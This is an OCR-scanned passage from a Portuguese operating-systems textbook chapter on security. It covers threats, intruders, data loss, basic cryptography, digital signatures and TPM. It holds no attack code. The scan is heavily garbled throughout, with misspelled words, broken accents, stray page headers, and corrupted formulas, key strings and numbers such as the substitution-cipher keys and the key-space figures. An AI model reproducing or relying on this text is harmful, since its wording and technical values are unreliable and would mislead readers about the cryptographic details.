teresses, O publicador ira en tao solid tar o artigo, A digi- 
taęao de urna unlca linha contendo ira marcar o finał 
do artigo. (Esse projeto tambem pode ser implementado 
milizando a comunicaęao de processos via TCP.) 
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Seguranęa 


Mttiias empresas detem va!iosas informaęoes guarda- 
das cuidadosamenie, quc podem ser de ordom tecnica (por 
ejcemplo, o projcio de urn novo chip ou de um software), 
comercial (como estudos sobre compelidorcs ou planos de 
marketing), financeira (planos para uma venda de aęoes), 
legał (por exemplo r documcnlos sobre uma possfvel hisan 
ou aqui$ięao), enlre muitas outras possibi lida des, Freąuen- 
tememe, essa informaęao esia proicgtda por seguranęas 
tmiformizados na entrada de um ediftcio, quc vcrifkam 
se as pessoas que o ademram estao portando um cracha 
apropriado, Alem disso, muitos escriiórios podem ser tran- 
cados, bom como alguns gabinetes de arquivos, para asse- 
gurar que somente pessoas autorizadas tenham acesso a 
informaęao. 

Os computadores domćsticos tambem annazenam 
uma quamidade eada vez maior de dados importantes. 
Muiias pessoas guardam cm seus compuiadores informa¬ 
ęoes financeiras, como declaraęocs de irnpostos e numeros 
de cartoes de cred i to, As cartas de a mor agora sao digUais. 
Hoje cm dia, os discos rigidos estao rcpletos de fotos impor- 
tantes, vfdeos e filmes. 

Como essas informaęoes tern sido armazenadas com 
mnis frequenda em sistemas de computadores, toma-se 
cada vez mais necessario protege-las. A proteęao contra o 
iiso nao autorizado e, portanto, um aspccto fundamenta! 
de todos os sistemas operacionais. Inlelizmcme, oferecer 
essa proteęao nao tern sido facil, em virtude da ampla aceb 
taęao do erescimento desenfreado do tamanho do sisiema 
(e os bugs que o acompanham), visto como um fenomeno 
norma!. Nas próximas seęoes, esiudaremos assuntos re- 
lacionados coni seguranęa e proicęao, alguns analogos a 
proteęao da informaęao em papę! no mundo reai, porem 
outros sao exdusivamente para sistemas dc computadorcs. 
Ncstc capitulo, estudarcmos a seguranęa aplicada a os siste¬ 
mas operacionais. 

As questoes relacionadas a seguranęa do sistema ope- 
racional mudaram radicalmeme nas ultimas duas decadas. 
Ate o i nici o dos anos 1990, poucas pessoas tinham um 
computador em casa e a maior parte da computaęao era 
realizada em empresas, universidades e outras instituięoes, 
cm computadorcs multiusuario quc variavam de compu- 
tadores dc grandę porte a minicomputadorcs. Quasc todas 
essas niaquinas estavam isoladas, sem conexao a nenii ii- 
ma rede, Assim sen do, a seguranęa se preocupava, quase 
que totalmente, com a proteęao dos dados dos usuarios, de 


forma que um nao acessasse o que penencia ao outro. Se 
tamo Trący ąuanto Marcia fosse m usuarias registradas do 
mesmo computador, o próbie ma era garantir que uma nao 
conseguisse acessar os arquivos da outra, sem impedir que 
das compartilhassem os arquivos que desejassem. Modclos 
e mecanismos elaborados foram desenvoIvidos de forma a 
garantir que nenhum usuario oblivesse os dirdtos de aces¬ 
so sem autorizaęao, 

Algumas vezes, os modclos e mecanismos cnvolviam 
classes de usuarios em vez de indhfduos isolados. Em um 
computador militar, por exemplo, os dados tinham de ser 
marcados como altamentc sccretos, sccrelos, confidenciais 
ou pub li cos, e era preciso impedir quc os sol da dos aces- 
sassem os direlórios dos generais, independenlenienie de 
quem fosse o soldado ou o generał Todas essas qucstocs 
foram amplamente invcstigadas, rdaiadas c implcmerna- 
das ao longo de algumas decadas. 

Uma premissa implfcita era de que, uma vez que um 
moddo fosse escolhido e implemcntado, o software estaria 
basicameme correto e garantiria o respdto as regras quais- 
qucr que lessem. Os modelos e o software costumavam ser 
bastante simples e normalnienie a premissa se ma min ha, 
Portanto, se, teoricamenie. Trący nao tivcsse permissao 
para acessar um arquivo de Marcia, na pratica da rcalmen- 
te nao conseguiria acessa-Io. 

Com o advento dos computadorcs pessoais e t!a ln- 
lernet e a diminuięao no uso de computadorcs de gran¬ 
dę porte e mi nicómp u tadores compartilbados, a situaęao 
mudou (embora nao totalmente, ja que os servidores com- 
partilbados nas redes locais empresariais sao exataniente 
como os minicomputadores compartilbados). Pelo menos 
para os usuarios doinesticos, a ameaęa de ter outro usuario 
accssando seus arquivos deixou de existir, ja que nao havia 
outros usuarios no mesmo computador. 

lirfdizrnenie, a medida que essa ameaęa di mi nu i u, ou¬ 
tras surgiram em seu lugar (sera a lei da conservaęao das 
ameaęas?): por exemplo, os ataques externos. Diferentes 
tipos de virus, vermes e outras pragas digitais comeęaram a 
proliferar, itwadindo os computadorcs atraves da Internet 
e, uma vez instalados, espalhando todo tipo de destruięao. 
Coiaborando com essa infestaęao disposta a causar o mai, 
surgiram os diferentes tipos dc software abarrotados dc 
funcionalidades, substiiuindo o bom e enxuto software de 
algunsanos atras, Com sistemas operacionais contencio cin- 
co milhoes de li uh as de eódigo no nudeo e aplicaębes com 



380 Si stem as opera do na is modernos 


uimanho padrao mmimo de 100 MB, exisie urn grandę nii- 
mero de erros {bugs)que podem ser explorados pelas pra- 
gas digitais de forma a exccutar operaęoes nao permitidas 
pelas regras. Temos, entao, u ma situaęao na qual e possfvcl 
demonsirar formalmemc quc um sistema e seguro c ainda 
assim ver cssc mcsmo sistema compromctido por conta dc 
algum crro dc eódigo quc permite quc um programa mal- 
-iutencionado realize operaęoes fonnalmente proibidas* 

Para abordar lodos os assuntos, este capftulo esta divi- 
dido em duas partes. A primeira trata detalhadamente das 
amcaęas, de forma a descobiirmos o que e predso proteger. 
A Scęao 9.2 apresenta a crip tog rafia moderna, quc e nma 
ferramema basica importante no mundo da segnranęa. Na 
Scęao 9.3, vcrcmos modclos forma is dc segnranęa c formas 
razoaveis de ofcrecer accsso seguro e proteęao a u su a ri os 
que possuem dados confidenciais, mas tambem necessitam 
compartilhar informaęoes com outros usuarios. 

Ale aqui, tudo bcm. At deparamos com a realidadc. As 
cinco scęocs seguintes sao essendais e tratam dc problcmas 
praticos dc seguranęa quc ocorrcm dioriamente* Como so- 
mos otimistas, ent ret anto, encerramos o capftulo com sc- 
ędes sobre formas de defesa contra as piagas do mundo real 
e u ma pequena discussao sobre pesątnsas em andamenio 
na area de segnranęa de compuladores, segnida de um bre- 
ve resumo. 

Yale a pena ressaltar que, embora este seja um Jivro 
sobre sistemas operadonais, a questao da seguranęa em 
sistemas operadonais c redes de computadores esta tao 
reladonada que e impossfvel separados. Por exemplo, os 
vfrus vem pela rede, mas a feta m o sistema operadonal. De 
forma geral, tentamos pecar por excesso e inclumios ma¬ 
teriał relevante sobre o assuiito, mas que nao esta de fato 
rc la do na do a area de sistemas operadonais. 



O ambiente de seguranęa 


Yamos comeęar nossa discussao esdarecendo quest6es 
termmoiógicas. Algumas pessoas u sam os termos 'seguran¬ 
ęa' e 'proteęao' como se fossem a mesma coisa. Todavia, 
imiiias vezes e titil distingiiir os problcmas gerais relacio- 
nados a assegurar que arquivos nao sejam lidos ou modifi- 
cados por pessoas nao autorizadas, os quais induem, de um 
lado, ąuestdes tecnieas, admimstrativas, legais c politicas e, 
de outro, mecamsmos espedficos do sistema operadonal 
empregados para ofcrecer seguranęa. Para evi1ar eon fu- 
sao, usarcmos o termo seguranęa para o prnblema gcral 
e a expressao mecanismos de proteęao para designar 
os mecanismos especificos do sistema operadonal usados 
para salvaguardar informaęoes no com pula don Contudo, 
a frontcira entre csses dois termos nao e bem dclinida. 
Primeiro, esttidaremos a seguranęa para en tender qtial e 
a naturcza do probkrna. Em seguida, veremos os mecanis¬ 
mos de proteęao e os modelos dispomveis que auxiliam na 
obtenęao da seguranęa. 


A seguranęa tern muitas faceias. Tres das mais impor- 
tantes sao a nalureza das ameaęas, a natureza dos iiivaso- 
res e a perda acidental de dados. Yeremos cada urna delas 
sępa rado men te. 

9 - 1-1 1 Ameaęas 

Do ponto de visia da seguranęa, os sistemas computa- 
donais tein ires objetivos gerais, com as correspondemes 
amcaęas relacionadas na Tabela 9.1. O primeiro objetivo r 
a confidencialidade de dados, c manter em segredo os 
dados secretos. Mais espedfi ca menie, sc o proprielario de 
alguns dados decidir que estes devcm ser disponibilizados 
apenas para ccrlas pessoas e nao para out ras, o sistema deve 
garamir que nao ocorra a liberaęao dos dados para pessoas 
nao auiorizadas. No rnmimo, o proprielario deve ser ca- 
paz de espedficar quem pode vcr o que e o sistema deve 
aśsegurar essas espedficaędes a cada arquivo, ideał me me. 

O segundo objetivo, a integridade de dados, signi- 
fka quc usuarios nao autorizados nao dcvem ser capazes 
de modifitar qualquer clado sem a permissao do propriela¬ 
rio, A modificaęao dos dados, nesse conicxto, nao significa 
apenas alteraęao dos dados, mas tambem sua remoęao e a 
indusao dc dados falsos, Se um sistema nao puder garan- 
tir que os dados nelc depositados permaneęam i na llera dos 
ate quc o proprielario decida altera-los, ele nao tera valor 
como um sistema de informaęao. 

O terceiro objetivo, a disponibilidade do sistema, 
significa qne ningnem pode peruirbar o sistema para deka¬ 
do imitiiizavel. Esses ataques de recusa de servięo estao 
cada vez mais comims. Por exemplo, se um computador for 
um servidor de Internet, enviar reątiisięoes em profusao 
pode incapadta-lo dc atende-las, pois todo o sen tempo de 
CPU sera consumido apenas examinando e descartando as 
requlsiędcs que cliegam. Se o semdor leva, por exemplo r 
100 [is para processar urna rcąuisięao para icr urna pagina 
da Web, qualquer um que cnvie dez mil reąuisięoes/s pode 
derruba-lo. Ha modelos e iccnologia razoaveis para lidar 
com ataąues a confiabilidadc e a integridade; ja evitar aia- 
ques de reeusa de servięos e muito mais dificil 

Poi' firn, um novo tipo dc ameaęa surgiu nos ultimos 
anos. Algumas vczes, intrusos podem tomar conta dc com¬ 
putadores domesticos (atravćs de vfrus ou outros meios) e 
transforma-los emzurtibis, dispostosa seguiras instruęoes 


Meta 

Ameaęa 

Confidencialidade de dados 

Expostęao de dados 

Integridade de dados 

Manipulaęao de dados 

Disponibilidade do sistema 

Recusa de servięos 

Exclusao de invasores 

Controle do sistema por virus 


I Tabę*a 9.1 Seguranęa: metas e ameaęas. 
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do imraso a qualquer memento. Os zumbls costumani ser 
utilizados para enviar spam, de forma que o mentor por 
tras do ataąue de spam nao possa ser identificado. 

De certa forma, cxisie ainda outro tipo de ameaęa que 
esta muito mais ligado a soeiedade do que a os indwfduos 
em particular. Ernstem pessoas que aiimcmam tima ami- 
patia em reiaęao a deierminados pafses on grupos (etnicos) 
ou que simplesmente tem raiva do nnmdo como um todo 
e q u erem destruir o quanto p u de rem de sita infra estru tura, 
sem se importar com a natureza do estrago on com as vtti- 
mas espedficas, Em gcraJ, essas pessoas acham que o ata- 
quc aos compuiadorcs dos inimigos e uma boa alternativa, 
mas csqucccm dc focar snas aęocs com cxatidao. 

Outro aspecto do problema de seguranęa e a privaci- 
dade: proteęao de individuos contra o ma u uso de informa- 
ęao sobre des, isso implica varias questóes legais e morais. 
O govemo deve reuiiir dossies sobre alguem para capturar 
um fraudador de X, seja X 'previdencia' ou Impostos', dc- 
pendendo dc sua politica? A polfcia dcve ter autorizaęao dc 
inYcsligar alguem para combater o crimc organizado? Os 
empregadores e as companhias dc seguros tem direitos? 0 
quc acontece ąuando esses direitos eniram cm conflito com 
os direitos mdmduais? Todas essas questoes sao extrema- 
mente importantes, mas estao alem do escopo deste livro. 

9.1.11 inva$ores 

A maioria das pessoas tem um coinporiamento cordial 
c obedcce as 1 cis; portamo, por que a preoeupaęao com 
a seguranęa? Porque infelizmeme ha os nao tao cordiais 
e que querem causar problemas (provavelmente para seu 
próprio beneffcio comercial). Na literatura sobre seguran- 
ęa, as pessoas que bisbilhotam em coisas quc nao Ihes di- 
zem respeito sao chamadas dc invasores ou algumas vezcs 
de adversarios. Os invasores agem de duas maneiras di- 
feremes, Os ineasores passhos quercm apenas ler os ar- 
quivos que nao estao autorizados a ler. Os mvasores ativos 
sao mais nocivos; qucrem alterar dados alheios, Durantc o 
projeto de um sistema segttro contra imasores, e impor- 
tante ter cm mente qnc tipo dc invasor sc esta tentando 
combater. Algumascategorias conmns sao: 

1. Curiosidades casuais dc usuarios leigos. Muitas pes¬ 
soas tein, em suas mesas, compuiadorcs pessoais 
que estao conectados a um servidor comparttlhado 
de nrquivos, e como a natureza Humana e como e, 
alguns deles, se nao Ihes forem colocadas bar rei ras, 
lerao as mensagens dc corrcio cl et roni co, alem de 
outros arquivos de outras pessoas. A maioria dos 
siśtcmas UNIX, por excmplo, tein como configu- 
raęao dc fauli que todos os arquivos reccm-criados 
podem ser lidos poi todos. 

2. Espionagemporpessoalinterno, Estudantes,progra- 
madores de sistemas, operadores e outros tecnicos 
muitas vczes considcram um desa fi o pessoal que- 
brar a seguranęa de um sistema de computaęao local 


Muitas vezes sao aliamente treinados e dispostos a 
dedicar bastante tempo para conseguir esse intuito. 

3, Tentativas determinadas de ganhar dinheiro. Alguns 
programadores de ban cos lenta m mu bar o banco 
para o quai trabalham. Os esąuemas variam, desde 
a alteraęao do software para truncar em vez de ar- 
redondar os rendimentos, mantendo a fraęao de um 
centesimo para des mesmos, dcsvio de contas que 
nao sao usadas por anos, ate extorsoes ("Pagucm-me 
ou destmirei todos os registros do banco"). 

4, Espionagem comercial ou mili tar. A espionagem 
e uma tentativa premeditada c financiada por um 
competidor ou por um pars estrangeiro para roubar 
programas, acordos secretos, ideias patenteaveis, 
Lecnologia, projetosde circttitos, planos de negócios 
e assim por dianie. Muitas vezes essa lemat i va en- 
volve "grampos telefonicos' ou ate mesmo a insta- 
laęao de antenas direcionadas ao conipulador para 
colher sua radiaęao eletromagnetica* 

Devc estar claro quc evitar que um governo estran- 
geiro hostii roubc segredos mil i tar es e um assunto muito 
diferente de tentar impedir que estudantes insi ram uma 
mensa gem engraęada como a 'mensa gem do dia' no siste¬ 
ma. O esforęo de seguranęa e proteęao depende claramente 
de quem se imagina que seja o inimigo. 

Outra categoria de praga de seguranęa que tem se ma¬ 
ni Te sta do nos ultimos anos e o vfrus # que sera discutido 
pos tenor men te com mais atenęao. Um virus, basicamen- 
te, e uin pedaęo de código que se replica e (normalmente) 
causa algum dano. Em um ceno sentido, quem escreve um 
vfms e tambem um invasor, muitas vezes de alta capach 
dade tecnica. A diferenęa entre um invasor convendona! 
e um virus e que o primeiro refere-se a uma pessoa que 
esta tentando invadir pessoalmente um sistema para causar 
danos; ja o vfrus e urn programa escrito por alguem e que 
foi lanęado no mundo a firn dc causar danos. Os invasores 
tentam invadir sistemas especificos (por exemplo, algum 
sistema bancario ou do Pentagon o) para roubar ou destruir 
dados espedficos; ja o criador do vfrus deseja causar danos 
mais gerais, sem preocupar-se com o que ou quem, 

,_ 9.131 Perda addental de dados 

Alem das amcaęas ca usadas por im asores nocivos, da¬ 
dos valiosos podem ser perdidos por acidente. A Igo mas das 
causas mais comuns de perda addental dc dados sao: 

1. Fenómenos naturats: incendios, enciientes, terre- 
molos, guerras, mótins ou ratos roendo fitas ou dis- 
cos IIexfveis. 

2. Erros dc hardware ou de software: defeitos na CPU, 
discos ou fitas com problemas de leitura, erros de 
telecomunicaęao, erros de programas. 

3. Erros humanos: entrada incorreta de dados, monta- 
gem incorreta de disco ou fita, execuęao do progra- 






Sn#w 


38 2 Sistemas operacionais modern os 


ma errado, perda de disco ou Fu a on algum outro 
erro. 

A maioria dcssas cansas pode ser tralada com a maiiu- 
lenęao adeąuada dos backups, preferivdinente em urn lugar 
disiame dos dados originais, Embora proteger da dos contra 
perda acidental possa parecer banał se comparado a prote- 
ger contra hwasores inteligentes, na praiica provavelmente 
mais da nos sao causados pelo primeiro que pelo ultimo. 



Criptografia basica 


A criptografia Lem um papel importanie na seguranęa. 
Muitas pessoas conhecem os cript ogra mas de jornais, que 
sao pequenos quebra-cabeęas nos quais cada letra foi sis- 
tematicamente substituida por outra. Isso esta tao relado- 
nado a criptografia moderna quamo os cacborros-qucntcs 
a culinaria reąuintada. Nesta seęaa oferecemos uma visao 
geral da criptografia na era compulacional e esse conhe- 
cimento sera titil para cntender o restante desie capitulo. 
Contudo, uma discussąo mais seria sobre criptografia esia 
alem do escopo desie livro* Muitas obras excelemes sobre 
seguranęa de computadores disemem o tópico em deialhes. 
Ao leitor interessado, sao indicados estes livros: Kaufnian 
et al (2002) e Pfleeger e Pfleeger {2006), A seguir, discu- 
tircmos rapjdamente a criptografia para ieiiores que nao 
cstejain familiarizados com eta. 

O propósito da criptografia e Ievar uma mensagem ou 
um arquivo, chamado de texto puro, e criptografa-Io 
em um texto cifrado de tal modo que somente a pessoa 
autorizada saiba converte-lo novanieme para um texto 
puro. Para todos os outros, o texto cifrado e apertas urn 
monte incompreensfvel de bits. Embora possa parecer es- 
iratiho aos inidantes na area, os algoritmos (funęocs) crip- 
lografkos e dc decriptaęaosmpm devem ser publicos. Tcntar 
marne-los em segredo nunca fundoiia e oferece as pesso¬ 
as que estiverem tenlando manier os segredos uma falsa 
sensaęao de seguranęa, No mercado, essa tatka e chama da 
de seguranęa por obscuridade e somente e utilizada por 
amadores em seguranęa* Estran ha menie, nessa categoria 
tambem estao indufdas muitas das grandes corporaęoes 
multinacionais que, na verdade, deveriam saber disso. 


Na verdade, o segredo depende de parametros (dos al¬ 
goritmos) cha ma dos chaves. Se P for um arquivo de texlo 
puro, K f for uma diave criptografica, C for o texto cifrado e 
E for o aigoritmo criptografico (isto e, uma funęao), entao 
C- E(P , K E ), Essa ć a definięao dc criptografia. Ela diz quc 
o tcxto cifrado e obtido usando-se o aigoritmo (conheddo) 
criptografico, E, com o tcxto puro, P, e a cltave criptogra- 
fica (secreta), K & como parametros, A idda de que todos 
os algoritmos deveriam ser publicos e de que o segredo de- 
veria ficar resemdo as chaves e cha mada princtpio de 
Kerckhoffs e foi formula da no seculo XfX pelo criptógrafo 
holandes Augustę Kerckhoffs. Moje em dla, todos os profis- 
sionais serios dessa area aderern a essa ideia. 

Da mesma mancira, P = D(C. K p ) onde D e um algorit- 
mo dc decriptaęao c uma chave dc decriptaęao* Isso diz 
que, para obter o texto puro, P ( correspcmdente ao texto ci¬ 
frado, C e com a chave de decriplaęao, K r/ alguem executa 
o aigoritmo Dcom Ce K^como parametros. A relaęao emre 
essas peęas e mostrada na Figura 9.1. 

_ 9.2.11 Criptografia por chave secreta 

Para dcixar isso titais claro, considere um aigoritmo 
criptografico no qual cada letra e trocada por uma letra di- 
fcrciue — por exemplo, todos os As sao trocados por Q% 
todos os as sao trocados por todos os Cs sao trocados 
por Es e assim por dianie, desta maneira: 

texio puro: ABCDEFGHTJKLM NOPQRST 
U V W X Y Z 

texto cifrado: QWERTYbIOFASDFGHJKLZ 
X C V B N M 

Esse sistema geral e chamado dc substituięao mo- 
noalfabćtica, cuja c'have e a cadcia dc 26 letras corres- 
ponderues ao aifabeto completo. A chave criptografica e 
QWERTYUJOPASDFGHJKLZXCVBNM nesse exemplo. Para 
essa chave, o texto puro ATAQUE seria translormado no 
texto cifrado QZQJXT. A chave de decriptapo indica como 
obter novamente o texto puro a parlir do texto cifrado. 
Nesse exemplo f a chave de decriplaęao ć KXVMCNOPHQR- 
SZYUADLEGWBUFT, pois um A no texio cifrado ć um K no 
texto puro, um B no iexto cifrado e um X no lcxto puro etc. 



texto piano Aigoritmo 
criptografico 


Aigoritmo de 
decriptaęao 


texto piano 


-v- 

Processo criptografico 


Decriptaęao 


1 Figura 9,1 Relacionamento entne o texto puro e o texto cifrado. 
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A primeira vista, pode parecer umsistema segitro, pois, 
embora os analistas de criptografia conheęam todo o siste- 
nia (substitiuęao de letra por Ietra), eles nao sabem qttal 
das 26! 10-*possivcis cha v es estaosendo usadas. Con- 

tudo, dado nm pcąucno texto cifrado, o código pode ser fa- 
eilmcntc ąuebrado, O ałaquc basico aprovrita-se da vanta- 
gem das propricdadcs cstatfsticas das linguagcns nalurais. 
No ingles, por exemp!o, o e ć a letra mais comum, seguida 
por i o, a, n, i etc, As duas combinaęoes de letras mais co- 
nium, os cha mad os digramas, sao ih, in, er, re etc. Usando 
esse lipo de itifarmaęao fi ca mais facil quebrar o eódigo. 

Muitos sistemas criptograficos, como o most rado, tem 
a propriedade dc que, fornecida a diave criptografica, ter¬ 
na -sc menos complicado encontrar a chave dc dccriptaęao 
c vice-versa, Esses sistemas sao cha ma dos de cifragem de 
chave secreta on cifragem de chave simćtrica, Embo¬ 
ra os códigos da subsiituięao monoalfabetica sejam imiteis, 
oiitros algoriimos de chave simetrica sao conheeidos e re- 
Iativaniente seguros se as chaves forem snficiemerneme 
longas. Para unia seguranęa seria, ialvez seja mellior usar 
chaves de 256 bits, ofereeendo um espaęo de busca de 2 2 ™ » 
1.2 x 10 77 chaves. As chaves mais curtas podem demover 
amadores, mas nao as grandes potcncias. 

I Cifragem de chave publica 

Os sistemas por chave sccrcta sao efiricntcs, pois a 
ąuantidade de coniputaęao neccssaria para criptografar ou 
dccriptar urna mensagem ć controlavel; porem, ha urna 
grandę desvantagem: o emissor e o receptor deven% am- 
bos, possuir a chave secreta compartilhada* Eles podem 
ale mesmo ter de obte-la fisicamente, com um dando-a ao 
outro. Para contornar csse próbie ma, c usada a cifragem 
de chave publka (Diffie e Hellman, 1976). Esse sisie- 
ma apresenia a seguinte propriedade: chaves disiimas sao 
usadas para criptografia e dccriptaęao e, dada uina chave 
criptografica bem conherida, e praticamenie impossivel 
dcscobrir a diave de dccriptaęao correspondcnle. Sob essas 
ci ram sta nc i as, a chave criptografica pode ser publica e so¬ 
rcie mc a chave de dccriptaęao privada e mantida em segredo. 

Para se ler urna noęao da cifragem de diave publica, 
considere estas duas ąuestoes: 

Qucsiao I; Quanto ć 314159265358979 x 
314159265358979? 

Questao 2: Qual e a raiz quadrada dc 
39125715064 i9387090594828508241? 

A maioria dos aiunos da scxta serie, com lapis, pa¬ 
pci e a promessa dc um grandę soncte com co bert ur a sc 
a resposta cstiver correta, poderia responder ci qucstao 1 
em u ma ou duas lioras, A maioria dos ad ul t os, com lapis, 
papel e a promessa de um desconio de 50 por cento nos 
impostos pdo resto da vida, nao reso!veria a ąuestao 2 sem 
usar urna calculadora, um computador ou algurna aj uda 
externa. Embora as operaęoes de ełevar ao quadrado e de 


extraęao da raiz ąuadrada sejam inversas, suas complexi- 
dades computacionais sao muilo diferenies. Esse lipo de 
assimetria forma a base da cifragem de chave publka. A 
criptografia utiliza a operaęao facil, mas a dccriptaęao sem 
a chave rcqucr a realizaęao da operaęao difidl. 

lim si stema de chave publica, cha ma do RS A, explora 
o falo de a multiplicaęao de grandes niimeros ser inuito 
mais facil para um computador que a fatoraęao de numeros 
realnienie grandes, espedal nieme quando toda a ariunetk 
ca e impicmentada com basc na aritmetica dc módnlo c to- 
dos os numeros cnvolvidos Lem centenas de dfgitos {Rivest 
et a!,, 1978). Esse sistema e amplaineme usado no mundo 
criptografico, assim como sistemas baseados em logaritmos 
discretos (El Gamal, 1985), O principai problema da cifra- 
gem de chave publica e que ela e milhares de vezes mais 
lenta que a criptografia simetrica. 

A cifragem de chave publica fundona com todos esco- 
lliendo um par de chaves (publica, privada) e publicandoa 
chave publica. Esra e a chave nipiografica; a chave privada 
e a de dccriptaęao. Em geral, a criaęao da chave e autoinatń 
zada, possivel menie com u ma sen ha escol hida pdo usuario 
alimentada em um algoritmo como u ma semenie. Para cn- 
viar uma mensagem sccrcta para um usuario, um usuario 
emissor criptografa a mensagem usando a chave publica do 
receptor. Como somente o receptor tem a chave privada, 
apenas de pode decriptar a mensagem. 

9.2.ł I Funcoes de via unica 

Ha varias situaęocs, que veremos depois, em que ć de- 
scjavci ter algurna funęao, / com uma propriedade quc, 
dados/e seu parametrom, calcular y = /(m) seja facil, mas 
dada somente f{x), encontrar x seja computacionalmente 
inviavei, Essa funęao cosmma embaralhar os bils de um 
modo basianie complexo. Comeęa airibuindo xcomo um 
vaior inicial dey. Entao, a funęao teria um laco para iterar 
o nu mero de vezcs correspondcnle ao nu mero de bi ts I em 
x , com cada itcraęao pemiutando os bits dc y dc uma ma- 
ncira dependente da itcraęao, adicionando uma constante 
diferenie a cada itcraęao e geralmente misiuraudo os bits 
muito bem, Essa funęao e cha mada de funęao de resumo 
criptografico, 

9>2.41 Assinaturas digitais 

Mtutas vczes e necessario assinar um documento di- 
gitalmente. Por exemplo, suponha que um clientc dc um 
banco instma o banco a comprar algumas aęocs para clc, 
enviando uma mensagem pdo corrcio clctrónico. Uma 
hora depois dc a ordem ter sido enviada c cxcculada, as 
aęoes despencam. O cliente entao nega que tenha envia- 
do a mensagem eletrónica. O banco poderia produzir uma 
mensagem eletrónica, e ciaro, mas o cliente poderia alegar 
que o banco a forjou para obier uma comissao. Como um 
juiz saberia quem esia dizendo a verdade? 
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As assinaturas digitais tornam possfvel assinar mensa¬ 
gens eletrónicas e mitros documentos digitais de modo que 
elas nao possam ser posicriormcnie repudladas por quem 
as enviou, Urna maneira comum t primdro, submeter 
o documcnto a um aigoritmo dc resumo dc scntido uni- 
co que scja muito dlficil de invmer. A funęao resumo dc 
scntido ii ni co em geral produz um resultado, denominado 
resumo [hash) de tamanho fixo e independente do tama- 
nho do dotumento original As funęoes resumo de scntido 
linico ni ais conheridas e usadas sao o MD 5 (message digest 
5 — compendto de mensagens 5), que produz um resultado 
dc 16 bytes (Rivcst, 1992), e o SHA-l {seatre hash algori- 
thm — aigoritmo hash seguro I), que produz um resultado 
dc 20 byles (Nisl 1995), As ver$oes mais novas do SHA-1 
sao o SH A*25ć e o SH A-512, que produzern resultados de 
32 e 64 byLes, respectivamente, mas sao menos utilizados. 

O próximo passo prosu mc o uso de cifragem dc chavc pu¬ 
blica confonnc dcscrito antcrionnentc. Entao, o propnetario 
do documcnto apiica sua chave privada ao resumo para ob- 
ter D{resumo). Esse valor, chamado dc bloco de assinatura, e 
aneKado ao documcnto e enviado a o receptor, eon formę mos- 
ira a Figura 9,2, A aplicaęao dc D ao resumo algumas vezc$ 
e referida como decriptar o resumo, mas nao e, na verdade, 
nma dccriptaęao, pois o resumo nao foi criptografado. Trata-se 
apenas de u ma transformato matematiea sobre o resumo. 

Quando o documcnto c o resumo chegam, o receptor 
primeiro calcu la o resumo do documcnto usando MD 5 ou 
SHA, em acordo estabclecido antecipadamente. O receptor 
entao submete a chave publica do emissor ao bloco de assi- 
natura para obtcr£(D(rcsumo)), Fcito isso, dc 'criptografa' 
o resumo decriptado, cancclando e obtendo o resumo de 
volta. Sc o resumo calcułado nao for igual ao resumo do 
bloco de assinatura, o documento, o bloco de assinatura 
ou ambos serao adultcrados (ou aiterados poracidente). O 
valor desse csquema e irueressantc, pois apiica a cifragem 
dc chave publica (lenta) somente a urna parte relativanien- 
tc peąueno de dados, o resumo. Gbserve cotn atenęao que 
esse metodo só funciona se para todo x 

E(D[x))=x 

Nao e previamente garantido que todas as funęoes de 
criptografia tenham cssa propriedade, pois tudo o quc se 
pediu originalmente foi que 


D(E(x)) =x 

isto c, H c a funęao dc criptografia e D, a funęao dc dccripta- 
ęao, Para acrcsccmar a propriedade dc assinatura, nao im- 
porta a ordem de aplicaęao, isto ć, Dc E dcvem ser funęoes 
connKaiivas. Felizmeme, o aigoritmo RS A apresema essa 
propriedade. 

Para usar esse esquema de assinatura, o receptor deve 
conhecer a chave piiblica do emissor. Alguns usuarios 
publicam suas chaves publicas em su as paginas da Web, 
Outros nao fazem isso, pois ternem que um invasor altere 
secretamente sua cbave. Para eles, e necessario um meca- 
nismo aIternativo para disiributr chavcs publicas. Um me¬ 
todo comum de fazer isso consiste em anexar as mensagens 
do emissor um certificado da mensa gem, que rantem o 
nonie do usuario e a chave piiblica dighalmente assinada 
por um terceiro confiaveE Urna vez que o usuario tenha 
adąuirido a chave publica do terceiro confiavd, cle pode 
aceitar certificados de todos os emissores que empregam 
esse terceiro confiavcl para gerar sens certificados. 

Uma empresa que validc certificados c chamada de AC 
(autoridade certificadora). Entretanto, para que um usuario 
valide urn ceriificado reconheddo por uma AC, e necessa- 
rio obtera chave publica da AC. De onde cssa chave vem c 
como e possivel saber se da e a verdaddra? De modo gcral, 
e necessario um esąuema que gereticie as chavcs publicas, 
denominado infraestrutura de chave pdblica. Para os 
navcgadore$, o problema e resolvido dc maneira improvi- 
sadai todos vem pre-carregados com as cbaves publicas de 
cerca de 40 ACs. 

Antcrionnentc descrevemos como a cifragem de chave 
publica pode ser usada para assinaturas digitais. Convem 
mencionar que tambem existem esąuemas que nao envol- 
vem cifragem de chave publica. 

2 * 2 *51 Módulo de plałaforma confiavel 

loda criptografia requer cliavcs, Sc estas cstivercm 
compromctidas, tambem estara toda a seguranęa itclas ba- 
seadas. O annazenamento seguro das chaves e, port anto, 
essencial. Mas como armazenar chaves de forma segura em 
um sistema que nao e seguro? 

Uma das possibilidades sugeridas pclo setor c um pro- 
cessador chamado TPM (trusted platform module — módulo 
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1 Figura 9,2 (a) Calculando um bloco de assinatura. (b) O que o receptor recebe. 
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de plataforma confiavel), que e um criptoprocessador com 
espaęo interno nao volatil para o armazenamento de cha- 
ves. O TPM e capa z de executar operaęoes de criptografia, 
como a dfragem de blocos de texto puro ou a decriptaęao 
dc blocos dc tcxlo dfrados na mcmória principal c ain- 
da conscguc validar assinaturas digitais. Como cssas opc- 
raęoes sao rcalizadas no hardware cspecializado, das se 
tornam runi to mais rapidas e estao mais propensas a um 
uso mais amplo. Alguns computadores ja possuem proces- 
sadores TPM insialados e muitos ouiros poderao come-io 
no futuro. 

O TPM 6 extrcmamcmc controverso porquc diferentes 
grupos possuem idcias diferentes sobie quem dcvc contro- 
lar o proccssador e sobie o quc de ira prolcgcr c dc qucni. 
A Microsoft foi urna gramie defensora do conceito e de¬ 
seń volveu urna serie de teoiologias tapazes de ulihzario, 
incluindo Palladium, NGSCB e BitLocker. Ha visao da em- 
presa, o sistema operadonal comrola o TPM de modo que 
ele evite que program as nao autorizados sejam executados. 
Esses programas nao autorizados' po dem ser pi rai as (ou 
seja, copiados ilegalmente) ou simplesmente nao autoriza- 
dos pelo sistema operadonal. Sc o TPM cstivcr cnvolvido 
no proccsso dc inicializaęao, dc pode inicializar somente 
sistemas operadonais validados por urna chavc sccreta ar- 
